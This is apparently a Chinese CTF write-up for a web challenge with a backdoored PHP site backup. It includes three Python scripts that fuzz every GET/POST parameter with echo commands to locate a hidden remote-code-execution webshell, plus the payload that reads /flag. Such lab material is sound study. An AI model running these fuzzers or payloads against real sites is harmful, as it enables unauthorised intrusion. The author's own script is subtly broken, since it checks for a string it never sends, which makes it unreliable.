题目一览
进局子的前端:
那么先访问一下www.tar.gz,果然可以下载“
然后我人就傻掉了……
全是些莫名其妙的东西,难不成php也有花代码这么一说?
考点:fuzz脚本的编写
其实这些文件都是有讲究的,既然告诉你网站已经被黑了,这些源码中其实就藏着??。
那其实思路就简单了……找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE不就行了。
放上我的一波脚本……还是太菜了,就写了GET的,依旧慢的像蜗牛:
import requests
import re
import os
path = ‘****‘ #文件路径
url = ‘‘ #url
r = re.compile(br"\$_GET\[‘(\w+)‘\]");#匹配$_GET[‘XXX‘]
f_list = os.listdir(path)
for file in f_list: #逐步读文件
f = open(path + file)
con = f.read()
tmp = r.findall(con) #遍历所有GET请求
for j in tmp:
exp = url + file + ‘?‘ + j[1] + ‘=echo fuzz;‘ #构造GET请求的URL,带参传echo
res = requests.get(exp).text
if ‘777‘ in res: #若找到,输出
print(‘Find ‘+exp)
exit(0)
不过是能跑出来的:
直接构造payload:
/xk0SzyKwfzw.php?Efa5BVG=cat /flag
拿到flag:
这里贴一下飘零师傅的脚本:运用了线程池,速度快了很多(py2)
import requests
from multiprocessing import Pool
base_url = "http://localhost:8888/src/"
base_dir = "/Desktop/site/src/"
file_list = [‘zzt4yxY_RMa.php‘,........ ‘m_tgKOIy5uj.php‘, ‘aEFo52YSPrp.php‘, ‘Hk3aCSWcQZK.php‘, ‘RXoiLRYSOKE.php‘]
def extracts(f):
gets = []
with open(base_dir + f, ‘r‘) as f:
lines = f.readlines()
lines = [i.strip() for i in lines]
for line in lines:
if line.find("$_GET[‘") > 0:
start_pos = line.find("$_GET[‘") + len("$_GET[‘")
end_pos = line.find("‘", start_pos)
gets.append(line[start_pos:end_pos])
return gets
def exp(start,end):
for i in range(start,end):
filename = file_list[i]
gets = extracts(filename)
print "try: %s"%filename
for get in gets:
now_url = "%s%s?%s=%s"%(base_url,filename,get,‘echo "sky cool";‘)
r = requests.get(now_url)
if ‘sky cool‘ in r.content:
print now_url
break
print "%s~%s not found!"%(start,end)
def main():
pool = Pool(processes=15) # set the processes max number 3
for i in range(0,len(file_list),len(file_list)/15):
pool.apply_async(exp,(i,i+len(file_list)/15,))
pool.close()
pool.join()
if __name__ == "__main__":
main()
当然还有赵师傅的脚本了,工整的很:(py3)
import os
import threading
from concurrent.futures.thread import ThreadPoolExecutor
import requests
session = requests.Session()
path = "/Users/jinzhao/PhpstormProjects/qwb/web2/" # 文件夹目录
files = os.listdir(path) # 得到文件夹下的所有文件名称
mutex = threading.Lock()
pool = ThreadPoolExecutor(max_workers=50)
def read_file(file):
f = open(path + "/" + file); # 打开文件
iter_f = iter(f); # 创建迭代器
str = ""
for line in iter_f: # 遍历文件,一行行遍历,读取文本
str = str + line
# 获取一个页面内所有参数
start = 0
params = {}
while str.find("$_GET[‘", start) != -1:
pos2 = str.find("‘]", str.find("$_GET[‘", start) + 1)
var = str[str.find("$_GET[‘", start) + 7: pos2]
start = pos2 + 1
params[var] = ‘echo("glzjin");‘
# print(var)
start = 0
data = {}
while str.find("$_POST[‘", start) != -1:
pos2 = str.find("‘]", str.find("$_POST[‘", start) + 1)
var = str[str.find("$_POST[‘", start) + 8: pos2]
start = pos2 + 1
data[var] = ‘echo("glzjin");‘
# print(var)
# eval test
r = session.post(‘http://localhost:11180/web2/‘ + file, data=data, params=params)
if r.text.find(‘glzjin‘) != -1:
mutex.acquire()
print(file + " found!")
mutex.release()
# assert test
for i in params:
params[i] = params[i][:-1]
for i in data:
data[i] = data[i][:-1]
r = session.post(‘http://localhost:11180/web2/‘ + file, data=data, params=params)
if r.text.find(‘glzjin‘) != -1:
mutex.acquire()
print(file + " found!")
mutex.release()
# system test
for i in params:
params[i] = ‘echo glzjin‘
for i in data:
data[i] = ‘echo glzjin‘
r = session.post(‘http://localhost:11180/web2/‘ + file, data=data, params=params)
if r.text.find(‘glzjin‘) != -1:
mutex.acquire()
print(file + " found!")
mutex.release()
# print("====================")
for file in files: # 遍历文件夹
if not os.path.isdir(file): # 判断是否是文件夹,不是文件夹才打开
# read_file(file)
pool.submit(read_file, file)
我还是别说我学过python了……
原文地址:https://www.cnblogs.com/keelongz/p/12643812.html
时间: 2024-08-30 17:09:37